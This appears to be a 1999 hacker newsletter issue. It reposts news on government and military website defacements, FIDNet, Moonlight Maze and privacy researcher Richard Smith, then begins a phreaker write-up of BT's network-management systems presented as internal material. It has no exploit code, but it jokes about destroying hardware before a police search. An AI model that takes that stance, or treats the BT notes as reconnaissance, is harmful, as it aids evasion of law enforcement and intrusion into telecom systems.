Times http://straitstimes.asia1.com/cyb/cyb1_1102.html NOV 2 1999 Probe into hack at S'pore Govt website THE National Computer Board is investigating Sunday's possible hacking into the Singapore Government website. Asked about the incident yesterday, Minister for Communications and Information Yeo Cheow Tong said the incident showed the risk all countries face. He said that adding safeguards may prove to be a temporary solution. "Each time you come up with some safeguards, we find that somebody else will come up with an equally innovative way to bypass our safeguards. "It's a continuing process we have to cope with," he said. He was speaking to reporters after his keynote address at the trade show, Sapphire '99 Singapore. In Sunday's incident, the contents of the page were reportedly removed and replaced with a message from a hacker. This was temporary and checks showed that the site was back to normal on Sunday itself. The hacker is said to be a foreigner and the National Computer Board yesterday said that the law here treated foreign hackers no different from local ones. It said: "Regardless of the nationalities of the alleged hackers, the Singapore police will work closely with their foreign counterparts to investigate and track the perpetrators." @HWA 34.0 Military Sites Invaded ~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre hV2k has claimed responsibility for defacing web sites that belonged to the Navy, Marines, and other sites. (Unfortunately this sort of thing has become so common it is no longer news.) News Bytes http://www.newsbytes.com/pubNews/99/138770.html Attrition.org - Defacement Mirror http://www.attrition.org/mirror News Bytes; Four US '.mil' Web Sites Invaded By Cracker Group By Bob Woods, Newsbytes WASHINGTON, DC, U.S.A., 02 Nov 1999, 1:12 PM CST A group of hackers - more accurately known as "crackers" - hit at least four US military Web sites sometime on Monday, according to a Web site that tracks such infiltrations. As Web site crackings go, though, three of the four invasions were relatively benign. The group "hV2k" claimed responsibility for the invasions, through text left behind at each site, according to copies or "mirrors" of the sites stored at Attrition.org. HV2k completely replaced the framed main page at the Navy Crane Center's (http://ncc.navfac.navy.mil ) Web site with the message, "Hi Mr DOD Admin, guess what.. YER SEKURITY SUCKS, oh and hV2k owns you. *kiss*" The group's infiltration of the AEGIS Training and Readiness Center Detachment in Norfolk, Va. (http://www.norfolk.atrc.navy.mil ) and the Marine Corps Air Station at Iwakuni, Japan (http://www.iwakuni.usmc.mil ) were not as bold. Neither page was greatly altered, save for a line at the bottom of each site. The note at the Marine Corps site said, "Hi kids, SLiPY of hV2k here just bitching about NT and how bad it sucks. Greets to NukeLear and Bleeding Angel." And "hi hV2k here" was left by the infiltrators at the AEGIS site. As of 1:40 PM EST today, the Iwakuni Web site was down, according to an automatically generated prompt at the site. HV2k's cracking of the Naval Air Warfare Center Aircraft Division (NAWCAD) at Webster Field, Md. (http://www.webster.webfld.navy.mil ) was much more subtle. The group inserted the message, "Hi! kiddies, no its not santa, its me, SliPY. hV2k" as black text on an otherwise undefaced page that has a black background. The message can be seen only if the page source is viewed through the Web browser, or if the bottom of the page where the text is located is highlighted. US military forces were not alone in facing hV2k's wrath. The official Web site of Canada's Department of National Defense and the Canadian Forces (http://www.dnd.ca ) was also defaced by the group sometime Monday. The group took the minimalist approach with this infiltration, simply writing at the bottom of the site's main page, "hi slipy and hv2k own." HV2k seems to have shifted its focus to military sites from much smaller commercial Web pages. The group claimed responsibility for cracking sites like "Bottle Cap Site," "America's Highway" and "Totally Dumb" in October, and "Think Tank Online Services" and the Geofluids Engineering Lab at the Seoul National University, according to Attrition.org's archives. And an Attrition.org official told Newsbytes in an e-mail interview that hV2k has been cracking sites for some time. Attrition.org is at http://www.attrition.org . Reported By Newsbytes.com, http://www.newsbytes.com . 13:12 CST Reposted 13:53 CST @HWA 35.0 Emergency FidNet Funding Canceled ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evilwench After the the House Appropriations Committee eliminated funding for the proposed Federal Intrusion Detection surveillance system (FIDNet), the White House found other funding through a $611 million mid-year fiscal 2000 budget amendment. Now less than one week before the Clinton Administration's proposed network security plan is slated to be unveiled, Congress has refused the request to provide the $39 million to fund the project. The proposed FIDNet system will be run by the General Services Administration who hopes that supplemental funding for FIDNet will be found by January but will go ahead with the plan regardless if specific money is allocated. Government Executive Magazine http://www.govexec.com/dailyfed/1199/110399b3.htm November 3, 1999 DAILY BRIEFING Congress refuses to fund security network By Drew Clark, National Journal's Technology Daily Less than one week before the Clinton Administration's proposed network security plan is slated to be unveiled and discussed, Congress has refused a last-minute request to provide $39 million in funds—including $8.4 million for the controversial Federal Intrusion Detection Network (FIDNet)—until at least January. Although House Majority Leader Richard Armey, R-Texas, has raised a number of questions about the privacy implications of FIDNet, the principal objection seems to be money. And with the House unwilling to dip into other sources to accommodate the administration's computer security proposal, the lack of funding could further delay the full-scale rollout of critical infrastructure plans. "The request came as an amendment to the Treasury-Postal appropriations bill after it had been signed into law," said John Scofield, a spokesman for House Appropriations Committee Chairman C.W. "Bill" Young, R-FL. "We didn't have time to give it consideration and will look at it next year." The administration had proposed funding the programs by using the counter-terrorism fund of the Department of Justice, Scofield said. But he said a Department of Justice program "shouldn't be used as a funding mechanism for something that is administration wide." Besides money for FIDNet, the request included $17 million for a program to train and recruit students in cyber-security; $2 million for the Department of Commerce's Bureau of Export Administration to support Information Sharing and Assessment Centers (ISACs), a public-private partnership to protect critical infrastructure; $5 million for computer security projects to be run by the National Institute of Standards and Technology; and $7 million for the Department of Treasury to help federal agencies establish public key infrastructures to conduct electronic transactions. Officials at the General Services Administration said they were prepared to continue bare-bones funding for FIDNet out of operating revenue—something they have done for the related Federal Computer Incident Response Capability (FedCIRC), a program the agency inherited from the Department of Commerce's National Institute of Standards and Technology last year. The agency hopes to that supplemental funding for FIDNet will be found by January. Without funding, "we can go ahead with the minimum activity as we have for the last several months," said Sallie McDonald, deputy assistant commissioner at GSA's office of information security. The administration's critical infrastructure plan is expected to be unveiled at a conference next Tuesday. But a pre-release summit involving officials from industry, government, and privacy advocates is planned for Thursday at the State Department, said a panelist for the event. @HWA 36.0 Cyberattacks Against DOD up 300 Percent ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Lt. Gen. David Kelley, the director of the Defense Information Systems Agency, has said that the number of cyber attacks reported this year against the Defense Department's information networks has more than tripled compared with last year. The number of cyber attacks or unauthorized intrusions into DOD networks and systems went from 5,844 in 1998 to 18,433 so far during 1999. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/1101/web-attack-11-03-99.html NOVEMBER 3, 1999 . . . 18:21 EST Cyberattacks against DOD up 300 percent this year BY DANIEL VERTON (dan_verton@fcw.com) Atlantic City -- The number of cyberattacks reported this year against the Defense Department's information networks has more than tripled compared with last year, according to the director of the Defense Information Systems Agency. The number of reported cyberattacks or unauthorized intrusions into DOD networks and systems skyrocketed from 5,844 in 1998 to 18,433 so far during 1999, according to Lt. Gen. David Kelley, director of DISA and manager of the National Communications System. Because not all attacks and intrusions are detected or reported by local system administrators and security officials, that number could be significantly higher. Speaking on Nov. 1 at the MILCOM 1999 conference, a three-day symposium focusing in military communications issues in the 21st century, Kelley said a look at the past five years indicates that cybersecurity and cyberwarfare is a "growth industry." According to Kelley, DOD organizations in 1994 reported only 225 attacks or unauthorized network intrusions -- roughly 1 percent of the number reported so far in 1999. "We need smarter systems that can help heal themselves," Kelley said, outlining his ideas for a departmentwide information assurance program. "Hope is not a strategy," he said. "With 100 percent certainty, this nation will face an information attack...[and] a serious one. We've got to get prepared." A sustained and coordinated intrusion into DOD networks that took place between January and March remains under investigation by the FBI [FCW, March 8]. The high-profile incident has led investigators to believe the hackers launched their attack using systems residing in Russia. However, no evidence has been released that indicates the Russian government in the attack. @HWA 37.0 White House Says US Vulnerable to Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by de4th Richard Clarke, a National Security Council advisor, has warned against the loss of electricity, transportation, or telecommunications due to information warfare. He said that many people where still in denial and that it was time to wake up to reality. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500053548-500087899-500306408-0,00.html U.S. vulnerable to cyber attacks, White House official says Copyright © 1999 Nando Media Copyright © 1999 Associated Press By EUN-KYUNG KIM WASHINGTON (November 4, 1999 9:50 p.m. EST http://www.nandotimes.com) - Reliance on the Internet has made the nation vulnerable to attacks by terrorists who strike through computers rather than with bombs or bullets, a White House security adviser said Thursday. "We could wake one morning and find a city, or a sector of the country, or the whole country have an electric power problem, a transportation problem or a telecommunication problem because there was a surprise attack using information warfare," said Richard Clarke, the National Security Council adviser who heads counterterrorism efforts. Clarke, speaking at a cyberthreat summit, said most Americans fail to realize how dependent they have become on computers - not only at home or at the office, but also to run their electricity, telephone, transportation and other infrastructure systems. Clarke compared the reliance to former drug addicts enrolled in a recovery program. "We need to take a lesson from that - at least they know they have a dependency problem. Many of you are still in denial," he told his audience during his keynote address. "Many people in the United States are still in denial." The summit, intended to raise awareness about computer security awareness, follows a string of electronic attacks launched against federal government Web sites, including those run by the White House, the Senate, the FBI and the U.S. Army's main Internet site. Last month, the head of the FBI's National Infrastructure Protection Center testified before Congress about the agency's struggle to keep up its battle against threats posed by computer-savvy terrorists and hackers trying to break into the government's most sensitive data networks. And, the General Accounting Office, the investigative arm of Congress, released a report warning that computer systems at the Defense Department, law enforcement and private industries are at risk because of poor management and lax oversight. Clarke said the nation's frenzy over the Y2K computer bug has made it even more vulnerable to cyber attacks. He said technicians hired to make a company's computer system Y2K compliant could easily slip "a little Trojan horse or malicious code" into the system instead. Clarke's warning echoed one issued by Sen. Robert Bennett, R-Utah, during a recent speech at the National Press Club. Bennett, chairman of the Senate's Year 2000 Committee, said he wouldn't be surprised to see his panel continue work next year on problems uncovered by the Y2K bug - mainly security and reliability. "We expect that (terrorists) will attempt to use Y2K as a cover for putting some kind of attack into a vulnerable place," Bennett said. "That is, when a Y2K solution goes in, they will fly underneath that with an attack of their own that will shut the system down and then you won't know whether the system shutdown was because of a terrorists attack or because of a Y2K accident." Clarke said the government has taken numerous steps to counter potential cyber attacks, including stepping up intelligence efforts, improving systems to detect intrusions and working with the private industries to come up with solutions. @HWA 38.0 Russia Withholding Information on Computer Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles U.S. Government computer experts have traced the code named Moonlight Maze attack to Internet service providers linked to Russia's Academy of Sciences, a government-funded group involved in research projects with military and civilian applications. Russian officials however aren't coming clean with information regarding these attacks leaving some investigators to wonder why? Reuters - Via Excite http://news.excite.com/news/r/991104/15/net-russia-usa Moscow Said To Withhold Full Help On Cyber-Blitz Updated 3:42 PM ET November 4, 1999 By Jim Wolf WASHINGTON (Reuters) - Russian authorities have withheld full cooperation in a multinational probe of computer heists from sensitive Defense Department and other U.S. networks, a top National Security Agency official said. "They haven't been fully forthcoming about what's happened on the Net," John Nagengast, assistant deputy director for information systems security, said late Wednesday. U.S. authorities are not yet sure whether electronic back doors may have been secretly crafted as part of the intrusions dubbed Moonlight Maze, he said in an interview with Reuters. "Did they leave behind a port for future access?" Nagengast asked rhetorically. "There's no conclusion you can draw and say 'It's finished. It's over'." Nagengast spoke after outlining cyber threats to the Overseas Security Advisory Council, a State Department-led group that feeds security-related information to more than 1,700 U.S. companies with overseas interests. U.S. government computer experts have traced the Moonlight Maze blitz to Internet service providers linked to Russia's Academy of Sciences, a government-funded group involved in research projects with military and civilian applications. "About the furthest I can go is to say the intrusions appear to originate in Russia," Michael Vatis, the top U.S. "cyber cop" told Congress last month in the first public rundown on the investigation by an executive branch official. Vatis, who heads the FBI-led National Infrastructure Protection Center, said intruders had stolen "unclassified but still-sensitive information about essentially defense technical research matters." Nagengast said Vatis had gone to Russia to pursue the case but had come back without having been able to obtain all the records he would have liked to help trace the culprits. "Some of the feedback we've gotten is 'we just don't have good audit logs -- so we don't know where these things could have come from'," Nagengast said, paraphrasing the Russian response. A spokeswoman for Vatis declined comment. Nagengast said it was premature to conclude that the cyber blitz, first detected in March 1998, was carried out by anyone in Russia just because it was routed through a given Internet service provider. "Was this a kiddie training exercise" by the Russian Academy of Sciences?, Nagengast said rhetorically. "Nobody knows at this point in time," he said. He added that the decline of known Moonlight Maze attacks could mean the intruders were "getting smarter and harder to see" or that they had "lost interest." Michael Peters, the National Security Agency's technical director for operations, readiness and assessments, told the meeting on cyber threats that a multinational "hacking" group called the "Enforcers" might be involved in the intrusions. He said the Enforcers counted members from the United States, Israel, Australia, Brazil and Russia. The group first made itself known when the U.S. government began to prosecute two youths from California for a series of February, 1998, cyber break-ins to Defense Department systems. Nagengast said some of the Moonlight Maze "hacks" had come through computer "hosts" in Britain. "And of course, they (the British) are fully cooperative with us." The National Security Agency is the Pentagon arm responsible for the computer security of U.S. national security organizations. The most costly and secretive intelligence agency, it eavesdrops on global communications and provides a steady stream of intercepted electronic data on topics of interest to the U.S. government. Vatis's organization -- the infrastructure protection center at the FBI -- leads the U.S. effort to prevent, detect and prosecute cyber crime. Sen. Robert Bennett, who has received classified briefings on "information warfare" as chairman of the special committee on the Year 2000 problem, told Reuters in an interview last month the intruders had vacuumed up vast amounts of publicly available data. Susan Hansen, a Pentagon spokeswoman, said Thursday that the Defense Department knew of no classified information that had been jeopardized in the Moonlight Maze intrusions. @HWA 39.0 Who is Richard Smith? ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by EvilWench Richard Smith identified the author of the Melissa virus, uncovered Microsoft's suspicious registration practices, he discovered the presence of unique identifying numbers in digital documents and this week, he revealed RealNetworks' sneaky data-gathering practices. (While we like and applaud what Mr. Smith has done we're not sure he rates the label of "living, national treasure".) Wired http://www.wired.com/news/technology/0,1282,32252,00.html The Internet's 'Living Treasure' by Leander Kahney 2:15 p.m. 2.Nov.1999 PST Whenever you read about an egregious invasion of consumer privacy on the Internet, one name keeps popping up: Richard Smith. Smith fingered the author of the Melissa virus. He uncovered Microsoft's suspicious registration practices, and he discovered the presence of unique identifying numbers in the majority of digital documents. This week, he revealed RealNetworks' sneaky data-gathering practices. Smith has been at the center of half-a-dozen of the biggest technology stories this summer -- stories reported around the globe. And he does it for love, not money. "The man's a living, national treasure for the Internet age," said privacy advocate Jason Catlett, founder of Junkbusters. "He's doing wonderful things. Richard's not a privacy zealot. He wants to find the consequences of things. "He's independent of money and he's independent of politics," Catlett said. "He's very good at thinking through intrusive data gathering. If there were a dozen people like him, the Internet would be a very different place." A 45-year-old veteran programmer, Smith retired a couple of months ago from Phar Lap, the software company he helped build and still owns but no longer runs. He started looking at Internet security issues as a hobby about three years ago, uncovering bugs and security holes in email clients and browsers. A year ago he turned his attention to privacy on the Internet. "We are moving our lives more and more onto the Internet and it's very good at watching what we do," Smith said from his home in Brookline, Massachusetts, where he lives with his wife. "It's like a VCR recording your whole life. It can easily be rewound." Smith said he's worried that the lack of Internet privacy is a tremendous boon for the direct marketing industry and that personal data will come back to haunt consumers in legal proceedings. For example, Smith noted that Newt Gingrich's divorce lawyers are trying to keep purportedly sensitive emails out of the hands of his wife's lawyers. In a separate instance, a court ruled this week that telephone companies could sell customers' telephone logs to direct marketers, who can mine the data to determine individual consumer preferences. "We're going to get more and more junk mail," he said. "The noise level is going to go up and up. Maybe we'll get used to it, but I doubt it." Smith tapped into the issue of RealNetwork's underhanded data gathering practices while looking for material for a speech. He wanted something fresh to talk about and remembered an inconclusive report he'd read in an April edition of the Seattle Weekly about RealNetworks using secret serial numbers. He downloaded RealJukebox and loaded up a piece of software, called a packet sniffer, that decodes the stream of information his computer sent out over the Internet. The first thing he noticed was that every time he used it to play a CD, the software sent the CD's title and playlist to RealNetworks. He also noticed that it encrypted some information, so he enlisted a friend in Australia to break the code and unlock the data. It turned out to be a GUID, or unique identifying number, that can be used to identify who is using the software as effectively as a Social Security number. Smith said the whole thing took about half an hour, and that most of the time was spent figuring out how to use the RealJukebox software. He's started looking at other user-monitoring systems. For example, he said he's discovered that some junk email, when read, secretly sends out information about the user. Through banner ads, many high-profile Web sites are sending confidential user registration information to direct marketers without even knowing it. Smith looks mainly at popular software "so when it hits the press people say 'that affects me. I use that product.'" He does it for fun and out of curiosity, he said, though he's starting to "pre-consult" for some of the companies he's investigating, opening up the possibility of turning his hobby into a commercial enterprise. Smith's life hasn't changed much in light of all the publicity he's generated. "I talk to a lot of people I hadn't known before," he said. "I have a different crowd of people I go around with now." When he discovers a dodgy practice, Smith said the first thing he does is inform the company before writing it up for his Web site. Sometimes he tells the press before the company. At least, that's what Richard Purcell, the man in charge of Microsoft's data gathering policies, says. "It would be nice to answer an inquiry before doing it in a public forum," Purcell said. "This is what we call fairness." Although he may have caused Microsoft some embarrassing public relations headaches, Purcell said he bears no malice toward Smith. In fact, Purcell invited him up to Redmond afterwards to meet a number of the company's product people and flesh out some outstanding privacy issues. "He's a very talented technologist," Purcell said. "I like him." @HWA 40.0 Federal Guidelines for Searching and Seizing Computers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by newbie Worried about being busted? Scared that the feds may come and take all of your computers? Is that Thermite bomb really necessary? This may be of interest, the Federal Guidelines for Searching and Seizing Computers. Department of Justice http://www.usdoj.gov/criminal/cybercrime/searching.html#FED_GUID @HWA 41.0 Canadian Defense Site Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Department of National Defense Web site was defaced last Monday night. The National Investigative Service is attempting to locate the perpetrators. Officials said that no sensitive information was accessed. Globe Technology http://www.globetechnology.com/archive/gam/News/19991103/UDEFEM.html National Defence Internet site falls prey to attack by hacker No sensitive information revealed despite security breach, DND says TYLER HAMILTON Technology Reporter Wednesday, November 3, 1999 Toronto -- Computer hackers broke into the Department of National Defence Web site on Monday night, the latest in a recent series of security breaches on federal, provincial and municipal Web sites in Canada. DND spokesman Captain André Berdais said the attack was the first major hacking incident on the department's Web site, and that the National Investigative Service is trying to track down who breached the site -- and how they did it. "We're dealing with this as if it's an act of vandalism," Capt. Berdais said. He said the breach occurred at about 6 p.m. Monday evening, and that an incident-response team discovered the breach and shut down the site at about 8 p.m. "There was no sensitive information [accessed]," he said. "What was breached was our Web site that passes information to the public. None of the other internal computer systems have been hit." This isn't the first time the DND's Web security policies have been the subject of controversy. In September, it was discovered that the resumés of at least five former and current eavesdroppers had been posted on its site, including detailed information about the classified equipment they used and the restricted areas they had access to. Monday's breach, however, represents the first time a hacker was able to access and manipulate the department's Web site. Similar attacks have occurred recently on provincial and municipal government Web sites. The City of Mississauga and Peel Board of Education sites were hacked last week, and in August the Web site of Ontario's Ministry of Northern Development and Mines was breached and various network passwords were stolen. In the latter case, the culprit littered the site with South Park cartoon graffiti and warned the government of its security flaw -- no major information was taken or damage done. Still, such breaches illustrate how easy it is for hackers to meddle with computer systems -- even those belonging to the federal department in charge of the nation's security -- and how seemingly harmless acts of vandalism can escalate into calculated terrorism. The Canadian Security Intelligence Service issued a report in August warning that cyberterrorism and Internet vandalism are becoming a major concern for societies that depend on computer-based communications. Dave Cosgrave, an Internet expert with the Alliance for Converging Technologies in Toronto, said governments around the world are at the stage of weighing the efficiencies and cost savings associated with the Internet with the potential risks of going on-line. "Certainly, the more you open up government services and information to on-line avenues, [the more] you expose yourself to risk," he said. "But I don't think there's a compelling argument in telling governments to sit back and wait." Canada has been moving aggressively to bring more public services to the Internet. For example, Canada Post Corp. recently launched an electronic post office to carry the nation's bills, documents and letters in digital form over the Internet. A successful breach of that site might conceivably give a hacker instant access to the nation's mail system. "I'm not going to say it doesn't bother us, but it's part of business when you have business on the Internet," Capt. Berdais said. "Like everything else in the military, there's lessons learned from any type of incident . . . because it's the Internet, it's not unexpected. And we do have measures to deal with it." @HWA 42.0 Defacement of South Africa Statistics Site Investigated ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Alien Plague An investigation into the latest attack on South Africa's Statistics web site has revealed that the assault originated from a dial-up user in the US in the early hours of Wednesday morning. This is the second time in two months the site has been defaced, despite the fact that a private company was called in to provide a firewall and surveillance after the first defacement. Africa News http://www.africanews.org/south/southafrica/stories/19991104_feat12.html South Africa Statistics website hacked again despite surveillance Business Day (Johannesburg) November 4, 1999 By Pamela Whitby Johannesburg - An investigation into the latest attack on Statistics SA's website has revealed that the hack originated from a dial-up user in the US in the early hours of yesterday morning. This is the second time the website has been hacked into in two months, despite Statistics SA contracting a private sector company to provide a firewall and surveillance. Statistics SA head Mark Orkin said: "This hack is completely unrelated to the previous one a few weeks ago." An intrusion detection signal was recorded, but before it was picked up the hacker managed to bypass the administrative protection on the server." While investigating the hack, it was discovered that government sites worldwide are broken into at least 200 times a day. The logs of government websites in SA show these are hacked into two to three times a day. There was a trade-off between security and accessibility, Orkin said. "We need to offer convenient access for hundreds of genuine visits daily, so we have tried to increase security without obstructing visitors." The organisation is investigating extra security and will keep the website disconnected from its core systems. The site is hosted on a stand-alone server "so no core databases or archives were affected". @HWA 43.0 BT Network Admin Support System Development SYSTEM X and OMC network ops by Hybrid ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hybrid.dtmf.org/ _\|/_ [ GBH ] Gwahn Burnin Haxorz [ GBH ] _\|/_ BT Network Administation Support System Development SYSTEM X and OMC network operations.. BT PhoneBone tekniq By hybrid NOT TO BE SHOWN OUTSIDE BT. GBH internal awarez. [ _\|/_ ] | GBH | : : . . PART I (Introduction to BT managment on the PSTN) Introduction The technology within the network has advanced through digitalisation of both transmission and switching, and the introduction of computer contolled network elements. The greater reliability of this technology and the ability to manage and configure the elements remotely has created new opportunities for efficiant managment of the network. These opotunitys have been translated into a vision for the future operation and managment of the network, initially through the Network Administration Task Force (NATF) and subseqent refinements in terms of architecture (Network Managment Architecture), and process (Strategic Systems Plan (SSP)). THE VISI0N The vision can be summerised as: -+ end-to-end network managment -+ functioncal coverage of the whole network life cycle -+ fully integrated functionality -+ high levels of automation/decision support -+ conformant to architectual objectives: a) network managment hierarchy b) co-operative network architecture c) open systems platform End-to-End managment It is essential to be able to manage networks made up of elements from different vendors and different generations of equipment in a consistant manner, so that the network can be viewed as a complete entity which provides a managed service platform. Whole Life Cycle Networks and services must be managhed from 'cradle to grave' (figure 1), covering: -+ forecasting -+ requirments analysis -+ detailed dimensioning and project planning -+ data building -+ installation and commisioning -+ maintenance/billing/traffic managment -+ repair -+ performance -+ enhancment/withdrawal future service | pre-service | | requirments | data building O forceasting / \ installing / \ performance / \ commissioning /\ \/ / \ FIGURE 1 / \ NETWORK AND / \ SERVICE LIFE O---------------<---------------O CYCLE / \ / \ / statistics billing maintenance \ traffic managment repair Hands free operation It is essensial to give network managers a high level of automation in order to eneable them to cope with the levels of complexity involved, vast amounts of data, apparently random nature of problems, and the need for speed, accuracy and consistancy in decision making. This requires: -+ incidents to be analyised automatically with the manager's concurance being sought to the solution offered; -+ automatic restoration of service to be achived whenever possible; -+ jobs depached to the workforce based on an optimum approach to jeopardy, costs, tactics and company image. -+ customers notification of service affected generated automaticaly to the approproate customer-facing unit; and -+ performanace statistics kept and analysed on all key proccesses. Development challenges The challenge for the system developers is to be responsive and meet new requirments quickly, while producing enduring systems which fit within an integrated set-the jigsaw-- the whole evolving towards the Network Administration Implementation Program (NAIP) and SSP vision in a cost effective manner. The developers have to move from a possision of well over 200 systems, most of which do not interwork, and many of which no longer offer all the essensial fucnctions, to a set of around 40 fully integrated high functionality key systems. Functions must be brought into line with the required buisness proccesses and must evolve to match the demands of new network technologys, for instance, planning rules for fibre systems must be continually reviwed to encompass increasing capacities and repeaterless operation. Systems must also take account of the changing operational organaisations and procedures, framework which can evolve without damaging the software investment already made. Solutions have to be achived within four planes of change as illustrated in figure 2. -+ linked planes of change +--------+ +------------------------------------------+ | | | | -+ people | | | | -+ groups/duties | N O-><-O-- | -+ skillz | | | USER ORGANISATION | -+ procedures | E | +-------------------o----------------------+ | | | | T | +-------------------|----------------------+ | | | | | -+ maintainence | W | | : | -+ planning | O-><-O-- | -+ repair control | 0 | | NETWORK MANAGMENT FUNCTIONS | -+ traffic/control | | +-------------------o----------------------+ -+ data building | R | | | | +-------------------|----------------------+ | K | | | | -+ computers | | | : | -+ terminals | O-><-O-- | -+ database | | | COMPUTING AND HOST ARCHITECTURE | -+ etc. +--------+ +------------------------------------------+ PART II (Adminstration of BT Network layers) ohday. -+ Interface Architecture The interface architecture provides the means to link all the pieces of the jigsaw together. By a mix of Open Systems Interconnection (OSI) products and pragmatic proprietry products, (for example, SNA, DECNET), a communications infastructure will be deployed to connect users to systems, systems to other systems for information sharing, and systems to the network elements they are managing. Key standards for these interfaces are being defined in the Co- Operative Networking Architecture (CNA-M) prgramme. -+ Data Architecture Data architecture offers the ability to standardise what the processes need to talk about. Defining the structure and format of the key information items provides a common currency which may be shared by the complete family of support systems. The object orientated style of the CNA-Managment communications protocols will ofrce the standardisation of objects as well as simple data structures in the CNA-M programme and external standards bodies like ISO, CCITT and the OSI Network Managment Forum. -+ System (Computing) Architecture The system architecture defines how a particular system is constructed, rather than the fucntional role it plays within the jigsaw. This deals with the following main conponments. -+ computer hardware -+ operating system -+ database managment system -+ transaction proccessing -+ communications drivers -+ man -- machine interfacing (MMI), and -+ application programming interface (API). There is a drive by the computing industry to create standard open interfaces to these elements, based on UNIX/POSIX and X Open standards to produce the open platform. The system developers are also driving towards reusable sub- functions and utilities. These two initiiatives are being bought together in the Generic Systems Architecture (GSA). -+ Integration and evolution SSP, ONA-M, Generic Systems Architecture and the Network Control Architecture Board (NCAB) 5 year vision for support systems evolution have all contibuted to creating a clear picture of how support systems will look in the future. It is important, however, that a very pragmatic approach is taken to realising this vision. -+ SWITCH MANAGMENT BT switch managment is carried out by the OMC (Operations Maintanace Center) for local exchanges and the operations and maintanance unit support system (OMUSS) (an OMC derivative) for trunk exchanges. This system has clocked up over 3000 system months of reliable service sinse its introduction n 1984. As the first majour network managment system, it has paved the way for the NACC/NOU structure. +-------------+ +---------+ +-----------+ | |<-----------------. | NMW2 | | | | CSS |<---------. | +---------+ | DCSS | +-------------+ | : | | | +--:-------------+ +-----------+ | | | | | NOMS 2 |-------------------. : | | | : +-/--------/--|--+ +-----:-----+ .- - - - - : - -/- -. / | | | | : / | / | | NOMS 1 | :/ :/ :/ : | | +------+ +---/--+ +--/---+ +---:--+ +-----------+ | | | | | | | | | | | | | FAS | | OMC | | TMS | | OMUSS| : : : : +------+ +------+ +------+ +------+ ALARMS :\ :\ :\ :\ | | | | | : | : | .----------. | .----------. .----------. .--------. | | | | | | | | | | : | | : | | | INTER- | | HOUSE O=========O LOCAL O=========O TRUNK O=========O NATIONAL O=== |________| | | | | | | |____:_____| |____:_____| |__________| : \ / : ______ : \ / : | | : x : |______| : / \ : .----:-----./ \.----:-----. | | | | | | | | | DDC |-------->| DESS | | | | | |__________| |__________| -+ CSS : Customer Service System -+ NMW2 : Network Managment Workstation -+ DCSS : District Control Support System -+ NOMS : Network Operations Managment System -+ FAS : Fibre Access System -+ OMC : Operations and Maintanance Center -+ TMS : Transmission Monitoring System -+ DDC : District Data Collector -+ DESS : Digital Exchange Support System -+ OMUSS : Operations and Maintenance Unit Support System There are over 60 systems in field serivce, with over 10,000 registered users, covering all trunk and local System X and AXE switches. Enhancment continues to run at a considerable pace, working its way into the field through two major realeses per year. +------------+ +--------+ +------------+ | EXCHANGE A |<----------| |<------------| EXCHANGE Z | | |---------->| |------------>| | +------|-----+ +----|---+ ^ +------|-----+ | | | | ==============|======================|=========|==============|============= : : : : +------:-----+ +---------:---------:---+ | ALARMS HAN | | | +--- | DELING SYS |<-----| O M S |----->| O-O +------:-----+ | | +--- : | | | | | +--- | | SRS LECS |----->| |_\ | | | +--- +----:----+ | | |TERMINAL | | USER FACLITYS/DUTIES | +--- |DISPLAY | | DEC VAX H/W |----->| ( ) +---------+ +-----:---:---:---:-----+ +--- | | | | | | | | A) ADMINISTRATION USERS / / \ \ B) MAINTANENCE USERS | | | | C) REMOTE USERS ^ ^ ^ ^ D) OTHER SYSTEMS A B C D -+ OMS : Operational Maintanence System -+ SRS : Subscribers Record System -+ LECS : Local Equipment Computer System The system is based on a VAX/VMS platform with Oracle relational database, its pwn basic forms/menus man --machine interface and X.25/V.24 communications drivers. The Exchange interfaces are conrolled through flexable data-driven translators and the basic structure of the system is highly modular. The priority evolution steps for OMC are: -+ interoperability with CSS, the transmission network survailance (TNS) system and workforce managment (NOMS2) -+ additional exchange interfaces for advanced services unit (ASU) etc., -+ adoption of advanced workstation (NMW2) man --machine interfacing -+ donation of functions to Generic Event Managment (GEMS). -+ Transmission Managment The transmission monitoring system (TMS) provides a comprehensive survailence system for the transmission aspects of the network. While the OMC manages a smaller set of complex network elements, the TMS faces the challenge of collecting, collating and displaying information from a vast array of physically dispersed conponments. After field-trial stages and recent product trials in London, the TMS is now being rolled out into the three pilot NOU catchment areas. The major TNS functions are: -+ alarm reception, display, filing, retrival and archiving -+ alarm association and comparason; -+ performance data proccessing and display -+ access to other systems (for example, the junction network system (JNS) database)). -+ Local Access Managment The flexible access system (FAS) is a system which has been developed to manage fibre in the local loop. Systems have been installed for the City Fibre Network and Docklands. The support system, the service access control center (SACC), once more shares a common lineage and technology platform with OMC combined with the ICENI database produced by NMD, and used as an element in the service desk and facilies managment systems. FAS was the first system to attempt to adopt the network managment hierarchy, with well defined interfaces between the service access control center (SACC) (network level controller) and element managers developed by equipment supplyers. It also adopted the network managment workstation (NMW1) to remove a multitude of various terminals. Until the future of the FAS is fully determined, the SACC will not be enhanced and evolved. However, the structure of future advanced local access managment is being considered based on experience of FAS, LLOFT (the local loop optical fibre trial) and cable TV managment. -+ Data managment and performance analysis The digital exchange support system (DESS) consists of many applications which are grouped together under a single code name. Some of the functions these 